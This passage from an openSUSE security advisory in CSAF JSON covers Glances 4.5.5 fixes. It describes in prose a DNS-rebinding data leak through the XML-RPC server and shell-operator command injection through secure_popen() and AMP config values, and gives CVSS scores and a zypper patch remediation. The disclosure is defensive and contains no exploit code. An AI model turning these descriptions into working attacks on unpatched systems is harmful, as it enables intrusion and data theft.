"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46608"
},
{
"cve": "CVE-2026-46611",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46611"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim\u0027s browser. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46611",
"url": "https://www.suse.com/security/cve/CVE-2026-46611"
},
{
"category": "external",
"summary": "SUSE Bug 1268856 for CVE-2026-46611",
"url": "https://bugzilla.suse.com/1268856"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-46611"
},
{
"cve": "CVE-2026-53925",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-53925"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. From 4.0.8 until 4.5.5, the secure_popen() function in glances/secure.py interprets \u003e (file redirection), | (pipe), and \u0026\u0026 (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via \u003e), chain arbitrary commands (via \u0026\u0026), or pipe command output to arbitrary programs (via |). This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-53925",
"url": "https://www.suse.com/security/cve/CVE-2026-53925"
},
{
"category": "external",
"summary": "SUSE Bug 1268984 for CVE-2026-53925",
"url": "https://bugzilla.suse.com/1268984"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-53925"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…